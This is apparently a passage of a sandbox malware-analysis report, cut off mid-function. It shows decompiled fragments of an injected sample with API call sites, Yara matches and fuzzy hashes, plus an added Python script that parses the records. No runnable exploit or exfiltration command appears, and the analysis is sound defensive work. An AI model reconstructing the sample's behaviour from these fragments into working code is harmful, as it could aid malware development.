                                          • Opcode Fuzzy Hash: 4c66ff9a4478d9bbb8529203072200f47768c45a053c050e59cedf310584231a
                                          • Instruction Fuzzy Hash: 579002A160210013410571994414616809AA7E0245BD1C021E10445D0DC965889571A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d5d54d3f5df9934613ecc23c4dfaac208e391d95c9a5fc2d4aa1f16aa5807245
                                          • Instruction ID: 7b1c29e1913b719bc1a99a1f8ae10bb685351eb83762f67df90c31ef63a89c25
                                          • Opcode Fuzzy Hash: d5d54d3f5df9934613ecc23c4dfaac208e391d95c9a5fc2d4aa1f16aa5807245
                                          • Instruction Fuzzy Hash: A9900265611100130105A599070450740D6A7D53953D1C021F1045590CDA61886561A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 26c548fb8cf0b607538dc16b72c5506fede83654446de4e2643b8267e6eed273
                                          • Instruction ID: 3049c52c52f2da07a432404f75d3d844a80808a0be47b1f87dc61e98c9418ac8
                                          • Opcode Fuzzy Hash: 26c548fb8cf0b607538dc16b72c5506fede83654446de4e2643b8267e6eed273
                                          • Instruction Fuzzy Hash: 0B90026961310012D1807199540860A4095A7D1246FD1D415A0045598CCD55886D63A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bcac8557cbb53d6f302ef4d0b50b96b2c8995c027f13cc91a4aa7a19caee01ab
                                          • Instruction ID: a148360f000a28055841a58aa698856f90b2f7742980597370012f7f713ae4ce
                                          • Opcode Fuzzy Hash: bcac8557cbb53d6f302ef4d0b50b96b2c8995c027f13cc91a4aa7a19caee01ab
                                          • Instruction Fuzzy Hash: DE90026170110013D140719954186068095F7E1345FD1D011E0444594CDD55885A62A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b0b9faa0300a28cad942a862bb63cbe14d5a5e0b0555760966327ce4671cd5b7
                                          • Instruction ID: fde6bc0deb1942b13568f6ec4f3988f1427fd826bf15c88435df177dac75a577
                                          • Opcode Fuzzy Hash: b0b9faa0300a28cad942a862bb63cbe14d5a5e0b0555760966327ce4671cd5b7
                                          • Instruction Fuzzy Hash: B990027160110412D10065D954086464095A7E0345FD1D011A5054595ECAA5889571B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4d3d3f8635f61a11a5c69434bf89ce03df3eb28c90c1b18323213dfa7f44694b
                                          • Instruction ID: 296d7441fc52b84d399a8ea8ded4211985a89714cab1c1a4fd7b2fd325e6600e
                                          • Opcode Fuzzy Hash: 4d3d3f8635f61a11a5c69434bf89ce03df3eb28c90c1b18323213dfa7f44694b
                                          • Instruction Fuzzy Hash: 8990027160118812D1106199840474A4095A7D0345FD5C411A4454698DCAD5889571A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 659df851a589f31a104e69e50ff901da85349300fdfe18a97256e1e6cfeeeaa4
                                          • Instruction ID: 8b314920335aec63b5ad1be2c2dce66182eeddbfc95289853701ea142d140646
                                          • Opcode Fuzzy Hash: 659df851a589f31a104e69e50ff901da85349300fdfe18a97256e1e6cfeeeaa4
                                          • Instruction Fuzzy Hash: DB90027160110812D1807199440464A4095A7D1345FD1C015A0055694DCE558A5D77E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                          • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                          • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                          • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: oLA
                                          • API String ID: 1279760036-3789366272
                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			// Decompiled from 0x004082E8, eight bytes before the E004082F0 entry listed below; both reference the same PostThreadMessageW call site (ref 0040834A), so the xlatb/add prologue here is preceding bytes decoded as code and E004082F0 is the cleaner listing of the same routine.
                                          			E004082E8(void* __eax, intOrPtr _a4, long _a8) {
                                          				char _v67;
                                          				char _v68;
                                          				long __edi;
                                          				signed int __esi;
                                          				void* __ebp;
                                          				void* _t10;
                                          
                                          				asm("xlatb");
                                          				_t10 = __eax + 0x6479b027;
                                          				if(_t10 <= 0) {
                                          					return _t10;
                                          				} else {
                                          					_push(__ebp);
                                          					__ebp = __esp;
                                          					__esp = __esp - 0x40;
                                          					_push(__esi);
                                          					__eax =  &_v67;
                                          					_v68 = 0;
                                          					E0041B850( &_v67, 0, 0x3f) = E0041C3F0( &_v68, 3);
                                          					_a4 = _a4 + 0x1c;
                                          					__eax = E0040ACC0(__eflags, _a4 + 0x1c,  &_v68); // executed
                                          					__eax = E00414E10(__esi, __eax, 0, 0, 0xc4e7b6d6);
                                          					__esi = __eax;
                                          					__eflags = __esi;
                                          					if(__esi != 0) {
                                          						_push(__edi);
                                          						__edi = _a8;
                                          						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
                                          						__eflags = __eax;
                                          						if(__eflags == 0) {
                                          							__eax = E0040A450(__eflags, 1, 8);
                                          							__eax = __al & 0x000000ff;
                                          							__eax =  *__esi(__edi, 0x8003, __ebp + (__al & 0x000000ff) - 0x40, __eax);
                                          						}
                                          						_pop(__edi);
                                          					}
                                          					_pop(__esi);
                                          					__esp = __ebp;
                                          					_pop(__ebp);
                                          					return __eax;
                                          				}
                                          			}
                                          Instruction addresses: 0x004082e8 to 0x00408372

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: f0663417be37ac60b37dcc60ca7b55f8b7b07ade5726b6813b2dfe337a929214
                                          • Instruction ID: f06a3c84731485efd8bcf30288739964e45de6767f589b29d5a6b80fc1befc2c
                                          • Opcode Fuzzy Hash: f0663417be37ac60b37dcc60ca7b55f8b7b07ade5726b6813b2dfe337a929214
                                          • Instruction Fuzzy Hash: 8A01DD31A803187BE720A6999D43FFF775CAB40F54F04416EFF04FA2C1D6A9691642EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
                                          				char _v67;
                                          				char _v68;
                                          				void* _t12;
                                          				intOrPtr* _t13;
                                          				int _t14;
                                          				long _t21;
                                          				intOrPtr* _t25;
                                          				void* _t26;
                                          				void* _t30;
                                          
                                          				_t30 = __eflags;
                                          				_v68 = 0;
                                          				E0041B850( &_v67, 0, 0x3f);
                                          				E0041C3F0( &_v68, 3);
                                          				_t12 = E0040ACC0(_t30, _a4 + 0x1c,  &_v68); // executed
                                          				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                          				_t25 = _t13;
                                          				if(_t25 != 0) {
                                          					_t21 = _a8;
                                          					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                          					_t32 = _t14;
                                          					if(_t14 == 0) {
                                          						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                          					}
                                          					return _t14;
                                          				}
                                          				return _t13;
                                          			}
                                          Instruction addresses: 0x004082f0 to 0x00408372

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                          • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                                          • Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                          • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                          				int _t10;
                                          				void* _t15;
                                          				void* _t16;
                                          
                                          				E0041A950(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46, _t16);
                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                          				return _t10;
                                          			}
                                          Instruction addresses: 0x0041a1da, 0x0041a1f0

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 25%
                                          			// Decompiled from 0x0041A093, thirteen bytes before the E0041A0A0 entry listed below; both reference the same ExitProcess call site (ref 0041A0C8). The leading "out 0xc6, eax" is a privileged I/O instruction that cannot execute in user mode, which marks this start as misaligned; E0041A0A0 is the cleaner listing of the same routine.
                                          			E0041A093(intOrPtr _a4, int _a8) {
                                          				void* _v117;
                                          				void* _t17;
                                          				void* _t18;
                                          
                                          				asm("out 0xc6, eax");
                                          				asm("adc eax, 0xdedc79bd");
                                          				_push(_t20);
                                          				E0041A950(_t17, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36, _t18);
                                          				ExitProcess(_a8);
                                          			}
                                          Instruction addresses: 0x0041a097 to 0x0041a0c8

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: d9c01e5a3c422b94e36911743212c275044931fd0de9522d023e229b378728c8
                                          • Instruction ID: 96223a1bc6ccf3356219dfdf91af698a6a08d6865a6f0096201850352eee1577
                                          • Opcode Fuzzy Hash: d9c01e5a3c422b94e36911743212c275044931fd0de9522d023e229b378728c8
                                          • Instruction Fuzzy Hash: 75E026706002047FD720CB74CC86FDB3FA8CF5D390F148199BC4997342C630A900CAA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A0A0(intOrPtr _a4, int _a8) {
                                          				void* _t10;
                                          				void* _t11;
                                          
                                          				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36, _t11);
                                          				ExitProcess(_a8);
                                          			}
                                          Instruction addresses: 0x0041a0ba, 0x0041a0c8

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3eff44def22108ec5dbbe3f68b1dcafc877c67398bb2adce5e5a735e0d3679b8
                                          • Instruction ID: c7701838e11ab0b4b1231229e905ea5f0cbe43b3a03b19830d0cd5296e4b5a0f
                                          • Opcode Fuzzy Hash: 3eff44def22108ec5dbbe3f68b1dcafc877c67398bb2adce5e5a735e0d3679b8
                                          • Instruction Fuzzy Hash: 04B02B71C010C0C5EB01D3A80608717794077C0309F52C011D1060280B4738C080F1F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%
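The per-function records above (API call sites with their `ref:` addresses, decompilation quality, Opcode ID and fuzzy-hash identifiers) are easier to compare across samples once parsed. The script below is an added example written for this page; it is not part of the Joe Sandbox report or of the analyzed sample. It parses a constructed, abbreviated copy of four records from the listing and flags the two decompilations that reference the same PostThreadMessageW call site at 0040834A, where E004082E8 (quality 52%) is a misaligned duplicate of E004082F0. The record boundaries, bullet fields and `Uniqueness Score` terminator are assumptions drawn from this page's layout, not a documented export format.

```python
"""Parse per-function records from a Joe Sandbox code listing (added example)."""
import re
from collections import Counter, defaultdict

# Constructed sample: four records copied, abbreviated, from the listing above.
SAMPLE_REPORT = """
• Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
• API ID: InitializeThunk
• String ID:
• Opcode ID: b0b9faa0300a28cad942a862bb63cbe14d5a5e0b0555760966327ce4671cd5b7
Uniqueness Score: -1.00%

C-Code - Quality: 52%
E004082E8(void* __eax, intOrPtr _a4, long _a8) {
    asm("xlatb");
}
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
• API ID: MessagePostThread
• Opcode ID: f0663417be37ac60b37dcc60ca7b55f8b7b07ade5726b6813b2dfe337a929214
Uniqueness Score: -1.00%

C-Code - Quality: 82%
E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
    E0041B850( &_v67, 0, 0x3f);
}
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
• API ID: MessagePostThread
• Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0041A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
    _t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
}
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
• API ID: LookupPrivilegeValue
Uniqueness Score: -1.00%
"""

# Field layout assumed from this page: bullet lines "• Name.MODULE(args), ref: ADDR",
# bullet "• Key: value" lines, a "C-Code - Quality: NN%" header followed by the
# decompiled signature "E........(", and "Uniqueness Score" closing each record.
API_RE = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
QUALITY_RE = re.compile(r"^C-Code - Quality:\s*(?P<q>\d+)%")
FUNC_RE = re.compile(r"^(?P<name>E[0-9A-F]{8})\(")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(?P<s>-?\d+(?:\.\d+)?)%")


def _new_record():
    return {"func": None, "quality": None, "apis": [], "fields": {}, "uniqueness": None}


def parse_records(text):
    """Split the listing into records; each record ends at its 'Uniqueness Score' line."""
    records, cur = [], _new_record()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := QUALITY_RE.match(line):
            cur["quality"] = int(m.group("q"))
        elif (m := FUNC_RE.match(line)) and cur["func"] is None:
            cur["func"] = m.group("name")  # first E........( line is the signature
        elif m := API_RE.match(line):
            cur["apis"].append({"name": m.group("name"), "module": m.group("module"),
                                "args": [a.strip() for a in m.group("args").split(",")],
                                "ref": m.group("ref").upper()})
        elif m := FIELD_RE.match(line):
            cur["fields"][m.group("key")] = m.group("val").strip()
        elif m := SCORE_RE.match(line):
            cur["uniqueness"] = float(m.group("s"))
            records.append(cur)
            cur = _new_record()
    return records


def overlapping_functions(records):
    """Call sites referenced by more than one decompiled function: the decompiler
    emitted the same code twice, typically once from a misaligned start address."""
    by_ref = defaultdict(set)
    for r in records:
        for a in r["apis"]:
            by_ref[a["ref"]].add(r["func"] or r["fields"].get("Opcode ID", "?")[:16])
    return {ref: sorted(funcs) for ref, funcs in by_ref.items() if len(funcs) > 1}


def api_summary(records):
    """Count resolved API call sites as MODULE!Name across all records."""
    counts = Counter()
    for r in records:
        for a in r["apis"]:
            counts[f"{a['module']}!{a['name']}"] += 1
    return counts


def low_quality_functions(records, threshold=60):
    """Functions whose decompilation quality is below the threshold (misalignment candidates)."""
    return [r["func"] for r in records
            if r["func"] and r["quality"] is not None and r["quality"] < threshold]


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    print(f"{len(recs)} records")
    for key, n in api_summary(recs).most_common():
        print(f"  {n:3d}  {key}")
    print("shared call sites:", overlapping_functions(recs))
    print("low-quality decompilations:", low_quality_functions(recs))
```

Running the script over a full listing instead of the sample gives the resolved-API inventory of the injected 0x00400000 image (RtlAllocateHeap, PostThreadMessageW, LookupPrivilegeValueW, ExitProcess and so on) separately from the ntdll-like code in the 0x01930000 dump, and the shared-call-site check removes the misaligned duplicates before any fuzzy-hash comparison between samples.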

                                          Non-executed Functions

                                          Strings
                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01A0B305
                                          • *** Inpage error in %ws:%s, xrefs: 01A0B418
                                          • The resource is owned exclusively by thread %p, xrefs: 01A0B374
                                          • The instruction at %p tried to %s , xrefs: 01A0B4B6
                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01A0B323
                                          • *** An Access Violation occurred in %ws:%s, xrefs: 01A0B48F
                                          • read from, xrefs: 01A0B4AD, 01A0B4B2
                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01A0B39B
                                          • *** then kb to get the faulting stack, xrefs: 01A0B51C
                                          • *** enter .exr %p for the exception record, xrefs: 01A0B4F1
                                          • The critical section is owned by thread %p., xrefs: 01A0B3B9
                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01A0B484
                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 01A0B352
                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01A0B2F3
                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01A0B2DC
                                          • <unknown>, xrefs: 01A0B27E, 01A0B2D1, 01A0B350, 01A0B399, 01A0B417, 01A0B48E
                                          • The instruction at %p referenced memory at %p., xrefs: 01A0B432
                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A0B38F
                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01A0B47D
                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A0B3D6
                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01A0B53F
                                          • *** enter .cxr %p for the context, xrefs: 01A0B50D
                                          • The resource is owned shared by %d threads, xrefs: 01A0B37E
                                          • Go determine why that thread has not released the critical section., xrefs: 01A0B3C5
                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01A0B314
                                          • an invalid address, %p, xrefs: 01A0B4CF
                                          • write to, xrefs: 01A0B4A6
                                          • This failed because of error %Ix., xrefs: 01A0B446
                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01A0B476
                                          • a NULL pointer, xrefs: 01A0B4E0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                          • API String ID: 0-108210295
                                          • Opcode ID: 962e02bf77884dcfb28e30ae9bfa5147565c3cc496418e5620fa52156ad5af10
                                          • Instruction ID: 8097b69b673b14b79b4039c0a7b617a8b29891aa5115c0aa032f853c7be79901
                                          • Opcode Fuzzy Hash: 962e02bf77884dcfb28e30ae9bfa5147565c3cc496418e5620fa52156ad5af10
                                          • Instruction Fuzzy Hash: B481367DA80200FFEB235B4AED49D6B3BB5EFAAB55F460088F50C1B192D3628511C672
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E01A11C06() {
                                          				signed int _t27;
                                          				char* _t104;
                                          				char* _t105;
                                          				intOrPtr _t113;
                                          				intOrPtr _t115;
                                          				intOrPtr _t117;
                                          				intOrPtr _t119;
                                          				intOrPtr _t120;
                                          
                                          				_t105 = 0x19348a4;
                                          				_t104 = "HEAP: ";
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E0195B150();
                                          				} else {
                                          					E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				_push( *0x1a4589c);
                                          				E0195B150("Heap error detected at %p (heap handle %p)\n",  *0x1a458a0);
                                          				_t27 =  *0x1a45898; // 0x0
                                          				if(_t27 <= 0xf) {
                                          					switch( *((intOrPtr*)(_t27 * 4 +  &M01A11E96))) {
                                          						case 0:
                                          							_t105 = "heap_failure_internal";
                                          							goto L21;
                                          						case 1:
                                          							goto L21;
                                          						case 2:
                                          							goto L21;
                                          						case 3:
                                          							goto L21;
                                          						case 4:
                                          							goto L21;
                                          						case 5:
                                          							goto L21;
                                          						case 6:
                                          							goto L21;
                                          						case 7:
                                          							goto L21;
                                          						case 8:
                                          							goto L21;
                                          						case 9:
                                          							goto L21;
                                          						case 0xa:
                                          							goto L21;
                                          						case 0xb:
                                          							goto L21;
                                          						case 0xc:
                                          							goto L21;
                                          						case 0xd:
                                          							goto L21;
                                          						case 0xe:
                                          							goto L21;
                                          						case 0xf:
                                          							goto L21;
                                          					}
                                          				}
                                          				L21:
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E0195B150();
                                          				} else {
                                          					E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				_push(_t105);
                                          				E0195B150("Error code: %d - %s\n",  *0x1a45898);
                                          				_t113 =  *0x1a458a4; // 0x0
                                          				if(_t113 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E0195B150();
                                          					} else {
                                          						E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E0195B150("Parameter1: %p\n",  *0x1a458a4);
                                          				}
                                          				_t115 =  *0x1a458a8; // 0x0
                                          				if(_t115 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E0195B150();
                                          					} else {
                                          						E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E0195B150("Parameter2: %p\n",  *0x1a458a8);
                                          				}
                                          				_t117 =  *0x1a458ac; // 0x0
                                          				if(_t117 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E0195B150();
                                          					} else {
                                          						E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E0195B150("Parameter3: %p\n",  *0x1a458ac);
                                          				}
                                          				_t119 =  *0x1a458b0; // 0x0
                                          				if(_t119 != 0) {
                                          					L41:
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
